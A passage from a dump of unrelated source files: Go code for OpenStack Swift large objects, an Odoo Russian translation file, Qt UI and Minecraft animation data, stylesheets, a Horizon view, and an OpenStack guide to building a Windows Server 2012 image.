This sets opts.Flags to\n// an appropriate value before calling DynamicLargeObjectCreateFile\nfunc (c *Connection) DynamicLargeObjectCreate(opts *LargeObjectOpts) (LargeObjectFile, error) {\n\topts.Flags = os.O_TRUNC | os.O_CREATE\n\treturn c.DynamicLargeObjectCreateFile(opts)\n}\n\n// DynamicLargeObjectDelete deletes a dynamic large object and all of its segments.\nfunc (c *Connection) DynamicLargeObjectDelete(container string, path string) error {\n\treturn c.LargeObjectDelete(container, path)\n}\n\n// DynamicLargeObjectMove moves a dynamic large object from srcContainer, srcObjectName to dstContainer, dstObjectName\nfunc (c *Connection) DynamicLargeObjectMove(srcContainer string, srcObjectName string, dstContainer string, dstObjectName string) error {\n\tinfo, headers, err := c.Object(dstContainer, srcObjectName)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsegmentContainer, segmentPath := parseFullPath(headers[\"X-Object-Manifest\"])\n\tif err := c.createDLOManifest(dstContainer, dstObjectName, segmentContainer+\"/\"+segmentPath, info.ContentType); err != nil {\n\t\treturn err\n\t}\n\n\tif err := c.ObjectDelete(srcContainer, srcObjectName); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}\n\n// createDLOManifest creates a dynamic large object manifest\nfunc (c *Connection) createDLOManifest(container string, objectName string, prefix string, contentType string) error {\n\theaders := make(Headers)\n\theaders[\"X-Object-Manifest\"] = prefix\n\tmanifest, err := c.ObjectCreate(container, objectName, false, \"\", contentType, headers)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := manifest.Close(); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}\n\n// Close satisfies the io.Closer interface\nfunc (file *DynamicLargeObjectCreateFile) Close() error {\n\treturn file.Flush()\n}\n\nfunc (file *DynamicLargeObjectCreateFile) Flush() error {\n\terr := file.conn.createDLOManifest(file.container, file.objectName, file.segmentContainer+\"/\"+file.prefix, file.contentType)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn file.conn.waitForSegmentsToShowUp(file.container, file.objectName, file.Size())\n}\n\nfunc (c *Connection) getAllDLOSegments(segmentContainer, segmentPath string) ([]Object, error) {\n\t//a simple container listing works 99.9% of the time\n\tsegments, err := c.ObjectsAll(segmentContainer, &ObjectsOpts{Prefix: segmentPath})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\thasObjectName := make(map[string]struct{})\n\tfor _, segment := range segments {\n\t\thasObjectName[segment.Name] = struct{}{}\n\t}\n\n\t//The container listing might be outdated (i.e. not contain all existing\n\t//segment objects yet) because of temporary inconsistency (Swift is only\n\t//eventually consistent!). Check its completeness.\n\tsegmentNumber := 0\n\tfor {\n\t\tsegmentNumber++\n\t\tsegmentName := getSegment(segmentPath, segmentNumber)\n\t\tif _, seen := hasObjectName[segmentName]; seen {\n\t\t\tcontinue\n\t\t}\n\n\t\t//This segment is missing in the container listing. Use a more reliable\n\t\t//request to check its existence. 
(HEAD requests on segments are\n\t\t//guaranteed to return the correct metadata, except for the pathological\n\t\t//case of an outage of large parts of the Swift cluster or its network,\n\t\t//since every segment is only written once.)\n\t\tsegment, _, err := c.Object(segmentContainer, segmentName)\n\t\tswitch err {\n\t\tcase nil:\n\t\t\t//found new segment -> add it in the correct position and keep\n\t\t\t//going, more might be missing\n\t\t\tif segmentNumber <= len(segments) {\n\t\t\t\tsegments = append(segments[:segmentNumber], segments[segmentNumber-1:]...)\n\t\t\t\tsegments[segmentNumber-1] = segment\n\t\t\t} else {\n\t\t\t\tsegments = append(segments, segment)\n\t\t\t}\n\t\t\tcontinue\n\t\tcase ObjectNotFound:\n\t\t\t//This segment is missing. Since we upload segments sequentially,\n\t\t\t//there won't be any more segments after it.\n\t\t\treturn segments, nil\n\t\tdefault:\n\t\t\treturn nil, err //unexpected error\n\t\t}\n\t}\n}\n"} {"text": "# Translation of Odoo Server.\n# This file contains the translation of the following modules:\n# \t* hr_recruitment_survey\n# \n# Translators:\n# Vasiliy Korobatov , 2019\n# Martin Trigaux, 2019\n# \nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Odoo Server 13.0\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2019-10-07 07:12+0000\\n\"\n\"PO-Revision-Date: 2019-08-26 09:10+0000\\n\"\n\"Last-Translator: Martin Trigaux, 2019\\n\"\n\"Language-Team: Russian (https://www.transifex.com/odoo/teams/41243/ru/)\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: \\n\"\n\"Language: ru\\n\"\n\"Plural-Forms: nplurals=4; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<12 || n%100>14) ? 1 : n%10==0 || (n%10>=5 && n%10<=9) || (n%100>=11 && n%100<=14)? 2 : 3);\\n\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"\"\n\"Print\\n\"\n\" Interview\"\nmsgstr \"\"\n\"Пчать\\n\"\n\" Интервью\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"\"\n\"Start\\n\"\n\" Interview\"\nmsgstr \"\"\n\"Начать\\n\"\n\" Интервью\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1\nmsgid \"About you\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q7\nmsgid \"Activities\"\nmsgstr \"Деятельность\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"Answer related job question\"\nmsgstr \"Ответить на вопрос, связанный с вакансией\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model,name:hr_recruitment_survey.model_hr_applicant\nmsgid \"Applicant\"\nmsgstr \"Соискатель\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_survey_survey__category\nmsgid \"Category\"\nmsgstr \"Категория\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,help:hr_recruitment_survey.field_survey_survey__category\nmsgid \"\"\n\"Category is used to know in which context the survey is used. 
Various apps \"\n\"may define their own categories when they use survey like jobs recruitment \"\n\"or employee appraisal surveys.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,help:hr_recruitment_survey.field_hr_applicant__survey_id\n#: model:ir.model.fields,help:hr_recruitment_survey.field_hr_job__survey_id\nmsgid \"\"\n\"Choose an interview form for this job position and you will be able to \"\n\"print/answer this interview from all applicants who apply for this job\"\nmsgstr \"\"\n\"Выберите форму собеседования на эту должность, и вы сможете \"\n\"распечатать/провести это собеседование со всеми соискателями, претендующими \"\n\"на эту работу\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q3\nmsgid \"Did you apply from an employee ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_job_survey_inherit\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.view_hr_job_kanban_inherit\nmsgid \"Display Interview Form\"\nmsgstr \"Открыть схему собеседования\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q4\nmsgid \"Education\"\nmsgstr \"Образование\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q2\nmsgid \"From which university did or will you graduate ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row2\nmsgid \"Getting on with colleagues\"\nmsgstr \"Ладить с коллегами\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row8\nmsgid \"Getting perks such as free parking, gym passes\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row1\nmsgid \"Having a good pay\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row3\nmsgid \"Having a nice office environment\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row7\nmsgid \"Having freebies such as tea, coffee and stationery\"\nmsgstr \"\"\n\n#. 
module: hr_recruitment_survey\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"If other, please specify:\"\nmsgstr \"Если другое, укажите, пожалуйста:\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_col2\nmsgid \"Important\"\nmsgstr \"Важное\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_hr_job__survey_id\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.view_hr_job_kanban_inherit\nmsgid \"Interview Form\"\nmsgstr \"Форма интервью\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.res_config_settings_view_form\nmsgid \"Interview Forms\"\nmsgstr \"Формы интервью\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model,name:hr_recruitment_survey.model_hr_job\nmsgid \"Job Position\"\nmsgstr \"Должность\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q6\nmsgid \"Knowledge\"\nmsgstr \"Знания\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row6\nmsgid \"Management quality\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.view_hr_job_kanban_inherit\nmsgid \"No Interview Form\"\nmsgstr \"Без плана собеседования\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_col1\nmsgid \"Not important\"\nmsgstr \"Неважно\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row5\nmsgid \"Office location\"\nmsgstr \"Расположение офиса\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q5\nmsgid \"Past work experiences\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.survey,description:hr_recruitment_survey.survey_recruitment_form\nmsgid \"\"\n\"Please answer those questions to help recruitment officers to preprocess \"\n\"your application.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1\nmsgid \"\"\n\"Please fill information about you: who you are, what are your education, experience, and activities.\\n\"\n\" It will help us managing your application.\"\nmsgstr \"\"\n\n#. 
module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q5\nmsgid \"\"\n\"Please summarize your education history: schools, location, diplomas, ...\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q7\nmsgid \"\"\n\"Please tell us a bit more about yourself: what are your main activities, ...\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"Print interview report\"\nmsgstr \"Печать отчета собеседования\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields.selection,name:hr_recruitment_survey.selection__survey_survey__category__hr_recruitment\nmsgid \"Recruitment\"\nmsgstr \"Найм\"\n\n#. module: hr_recruitment_survey\n#: model:survey.survey,title:hr_recruitment_survey.survey_recruitment_form\nmsgid \"Recruitment Form\"\nmsgstr \"Рекрутинговая форма\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_hr_applicant__response_id\nmsgid \"Response\"\nmsgstr \"Ответ\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model,name:hr_recruitment_survey.model_survey_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_hr_applicant__survey_id\nmsgid \"Survey\"\nmsgstr \"Опрос\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.survey,thank_you_message:hr_recruitment_survey.survey_recruitment_form\nmsgid \"Thank you for answering this survey. We will come back to you soon.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"The answer you entered is not valid.\"\nmsgstr \"\"\n\n#. 
module: hr_recruitment_survey\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"This question requires an answer.\"\nmsgstr \"Этот вопрос требует ответа.\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_col3\nmsgid \"Very important\"\nmsgstr \"Очень важно\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q6\nmsgid \"What are your main knowledge regarding the job you are applying to ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q8\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"What is important for you ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q1\nmsgid \"Which country are you from ?\"\nmsgstr \"\"\n\n#. 
module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row4\nmsgid \"Working with state of the art technology\"\nmsgstr \"\"\n"} {"text": "\n\n QmitkMicronTrackerWidget\n \n \n \n 0\n 0\n 321\n 181\n \n \n \n \n \n \n <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:'MS Shell Dlg 2'; font-size:8pt; font-weight:400; font-style:normal;">\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" text-decoration: underline;">MicronTracker</span></p></body></html>\n \n \n \n \n \n \n \n \n \n \n Calibration File: <none>\n \n \n \n \n \n \n \n \n Set Calibration File\n \n \n \n \n \n \n Qt::Horizontal\n \n \n \n 40\n 20\n \n \n \n \n \n \n \n \n \n Qt::Horizontal\n \n \n \n 40\n 20\n \n \n \n \n \n \n \n Qt::Vertical\n \n \n \n 20\n 40\n \n \n \n \n \n \n \n \n \n \n \n \n 120\n 50\n \n \n \n \n 120\n 80\n \n \n \n \n 120\n 0\n \n \n \n <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:'MS Shell Dlg 2'; font-size:7.8pt; font-weight:400; font-style:normal;" bgcolor="#000000">\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:8pt;"> </span></p>\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:8pt;"> </span></p>\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:8pt; text-decoration: underline; color:#ffffff;">output:</span><span style=" font-size:8pt;"> </span></p></body></html>\n \n \n Qt::NoTextInteraction\n \n \n \n \n \n \n \n 120\n 0\n \n \n \n \n 120\n 16777215\n \n \n \n \n 120\n 0\n \n \n \n test connection\n \n \n \n \n \n \n \n \n \n \n Qt::Vertical\n \n \n \n 20\n 40\n \n \n \n \n \n \n \n \n\n"} {"text": "{\n\t\"format_version\" : \"1.8.0\",\n\t\"animations\" : {\n\t\t\"animation.{{IDENTIFIER}}.flying\" : {\n\t\t\t\"loop\" : true,\n\t\t\t\"bones\" : {\n\t\t\t\t\"body\" : {\n\t\t\t\t\t\"position\" : [ 0.0, \"math.cos(query.life_time * 343.774) * 1.6\", 0.0 ],\n\t\t\t\t\t\"rotation\" : [ \"45.0 - math.cos(query.life_time * 1489.6) * 8.59\", 0.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"head\" : {\n\t\t\t\t\t\"position\" : [ \"-this\", \"math.cos(query.life_time * 343.774) * 1.6 - this\", \"-this\" ],\n\t\t\t\t\t\"rotation\" : [ \"query.target_x_rotation\", \"query.target_y_rotation\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwing\" : {\n\t\t\t\t\t\"position\" : [ \"-this\", \"-this\", \"-this\" ],\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * -45.0\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * -22.0\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwing\" : {\n\t\t\t\t\t\"position\" : [ \"-this\", \"-this\", \"-this\" ],\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * 45.0\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * 22.0\", 0.0 
]\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\t\t\"animation.{{IDENTIFIER}}.resting\" : {\n\t\t\t\"loop\" : true,\n\t\t\t\"bones\" : {\n\t\t\t\t\"body\" : {\n\t\t\t\t\t\"position\" : [ 0.0, -0.035, 0.0 ],\n\t\t\t\t\t\"rotation\" : [ 180.0, 0.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"head\" : {\n\t\t\t\t\t\"position\" : [ 0.0, -0.035, 0.0 ],\n\t\t\t\t\t\"rotation\" : [ \"query.target_x_rotation\", \"180.0f - query.target_y_rotation\", 180.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwing\" : {\n\t\t\t\t\t\"position\" : [ 3.0, 0.0, 3.0 ],\n\t\t\t\t\t\"rotation\" : [ -9.0, 72.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, 99.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwing\" : {\n\t\t\t\t\t\"position\" : [ -3.0, 0.0, 3.0 ],\n\t\t\t\t\t\"rotation\" : [ -9.0, -72.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, -99.0, 0.0 ]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n"} {"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All Rights Reserved.\n#\n# Copyright 2012 Nebula, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom horizon import tabs\n\nfrom .tabs import SystemInfoTabs\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass IndexView(tabs.TabbedTableView):\n tab_group_class = SystemInfoTabs\n template_name = 'admin/info/index.html'\n"} {"text": "/**\n * Copyright 2016-present, Baifendian, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. 
An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n@import '../variables.less';\n\n@duration: .2s;\n@zIndex: 1000;\n\n.bfd-modal--scrollbar-measure {\n position: absolute;\n top: -9999px;\n width: 50px;\n height: 50px;\n overflow: scroll;\n}\n\nbody.bfd-modal--open {\n overflow: hidden;\n}\n\n.bfd-modal {\n display: none;\n backface-visibility: hidden;\n}\n\n.bfd-modal__backdrop {\n position: fixed;\n top: 0;\n right: 0;\n bottom: -1px;\n left: 0;\n opacity: 0;\n transition: all @duration;\n z-index: @zIndex;\n background-color: rgba(0, 0, 0, .8);\n}\n\n.bfd-modal__modal {\n position: fixed;\n top: 0;\n right: 0;\n bottom: 0;\n left: 0;\n z-index: @zIndex;\n -webkit-overflow-scrolling: touch;\n outline: 0;\n overflow-x: hidden;\n overflow-y: auto;\n\n}\n\n.bfd-modal__modal-dialog {\n margin: 100px auto;\n width: 600px;\n transition: all @duration;\n}\n\n.bfd-modal__modal-dialog--lock {\n animation: bfd-modal-shake .8s;\n}\n\n@keyframes bfd-modal-shake {\n 10%, 90% {\n transform: translate3d(-1px, 0, 0);\n }\n\n 20%, 80% {\n transform: translate3d(2px, 0, 0);\n }\n\n 30%, 50%, 70% {\n transform: translate3d(-4px, 0, 0);\n }\n\n 40%, 60% {\n transform: translate3d(4px, 0, 0);\n }\n}\n\n.bfd-modal__modal-content {\n opacity: 0;\n transform: scale(.98) translate3d(0, -10%, 0);\n transform-origin: top;\n transition: all @duration;\n}\n\n.bfd-modal--sm {\n .bfd-modal__modal-dialog {\n width: 300px;\n }\n}\n\n.bfd-modal--lg {\n .bfd-modal__modal-dialog {\n width: 1000px;\n }\n}\n\n.bfd-modal__modal-header {\n background-color: @primary-color-deep;\n color: #fff;\n padding: 15px 20px;\n position: relative;\n border-top-left-radius: 2px;\n border-top-right-radius: 2px;\n h1, h2, h3, h4, h5, h6 {\n margin: 0;\n padding: 0;\n font-weight: normal;\n font-size: 14px;\n }\n}\n\n.bfd-modal__modal-header-close {\n position: absolute;\n top: 50%;\n right: 15px;\n margin-top: -11px;\n}\n\n.bfd-modal__modal-body {\n border-bottom-left-radius: 2px;\n border-bottom-right-radius: 2px;\n padding: 20px;\n background-color: #fff;\n}\n\ndiv.bfd-modal--open {\n .bfd-modal__backdrop {\n opacity: .6;\n }\n .bfd-modal__modal-content {\n opacity: 1;\n transform: scale(1) translate3d(0, 0, 0);\n }\n}\n"} {"text": ".App {\n text-align: center;\n}\n\n.App-logo {\n animation: App-logo-spin infinite 20s linear;\n height: 80px;\n}\n\n.App-header {\n background-color: #222;\n height: 150px;\n padding: 20px;\n color: white;\n}\n\n.App-intro {\n font-size: large;\n}\n\n@keyframes App-logo-spin {\n from { transform: rotate(0deg); }\n to { transform: rotate(360deg); }\n}\n"} {"text": "================================\nExample: Microsoft Windows image\n================================\n\nThis example creates a Windows Server 2012 qcow2 image,\nusing the :command:`virt-install` command and the KVM hypervisor.\n\n#. Follow these steps to prepare the installation:\n\n #. Download a Windows Server 2012 installation ISO.\n Evaluation images are available on the `Microsoft website\n `_ (registration required).\n #. Download the signed VirtIO drivers ISO from the `Fedora website\n `_.\n #. Create a 15 GB qcow2 image:\n\n .. code-block:: console\n\n $ qemu-img create -f qcow2 ws2012.qcow2 15G\n\n#. Start the Windows Server 2012 installation with the\n :command:`virt-install` command:\n\n .. 
code-block:: console\n\n # virt-install --connect qemu:///system \\\n --name ws2012 --ram 2048 --vcpus 2 \\\n --network network=default,model=virtio \\\n --disk path=ws2012.qcow2,format=qcow2,device=disk,bus=virtio \\\n --cdrom /path/to/en_windows_server_2012_x64_dvd.iso \\\n --disk path=/path/to/virtio-win-0.1-XX.iso,device=cdrom \\\n --vnc --os-type windows --os-variant win2k12 \\\n --os-distro windows --os-version 2012\n\n Use :command:`virt-manager` or :command:`virt-viewer` to\n connect to the VM and start the Windows installation.\n\n#. Enable the VirtIO drivers. By default, the Windows installer does not detect\n the disk.\n\n#. Load VirtIO SCSI drivers and network drivers by choosing an installation\n target when prompted. Click :guilabel:`Load driver` and browse the file\n system.\n\n#. Select the ``E:\\virtio-win-0.1XX\\viostor\\2k12\\amd64`` folder. The Windows\n installer displays a list of drivers to install.\n\n#. Select the VirtIO SCSI drivers.\n\n#. Click :guilabel:`Load driver` and browse the file system, and\n select the ``E:\\NETKVM\\2k12\\amd64`` folder.\n\n#. Select the network drivers, and continue the installation. Once the\n installation is completed, the VM restarts.\n\n#. Define a password for the administrator when prompted.\n\n#. Log in as administrator and start a command window.\n\n#. Complete the VirtIO drivers installation by running the\n following command:\n\n .. code-block:: console\n\n C:\\pnputil -i -a E:\\virtio-win-0.1XX\\viostor\\2k12\\amd64\\*.INF\n\n#. To allow the :term:`Cloudbase-Init` to run scripts during an instance\n boot, set the PowerShell execution policy to be unrestricted:\n\n .. code-block:: console\n\n C:\\powershell\n C:\\Set-ExecutionPolicy Unrestricted\n\n#. Download and install the ``Cloudbase-Init``:\n\n .. code-block:: console\n\n C:\\Invoke-WebRequest -UseBasicParsing https://cloudbase.it/downloads/CloudbaseInitSetup_Stable_x64.msi -OutFile cloudbaseinit.msi\n C:\\.\\cloudbaseinit.msi\n\n In the :guilabel:`configuration options` window,\n change the following settings:\n\n * Username: ``Administrator``\n * Network adapter to configure: ``Red Hat VirtIO Ethernet Adapter``\n * Serial port for logging: ``COM1``\n\n When the installation is done, in the\n :guilabel:`Complete the Cloudbase-Init Setup Wizard` window,\n select the :guilabel:`Run Sysprep` and :guilabel:`Shutdown`\n check boxes and click :guilabel:`Finish`.\n\n Wait for the machine shutdown.\n\nYour image is ready to upload to the Image service:\n\n.. code-block:: console\n\n $ openstack image create --disk-format qcow2 --file ws2012.qcow2 WS2012\n"} {"text": "/**\n * \n * WARNING! This file was autogenerated by: \n * _ _ _ _ __ __ \n * | | | | | | |\\ \\ / / \n * | | | | |_| | \\ V / \n * | | | | _ | / \\ \n * | |_| | | | |/ /^\\ \\ \n * \\___/\\_| |_/\\/ \\/ \n * \n * This file was autogenerated by UnrealHxGenerator using UHT definitions.\n * It only includes UPROPERTYs and UFUNCTIONs. Do not modify it!\n * In order to add more definitions, create or edit a type with the same name/package, but with an `_Extra` suffix\n**/\npackage unreal.mediaplayereditor;\n\n/**\n WARNING: This type was not defined as DLL export on its declaration. 
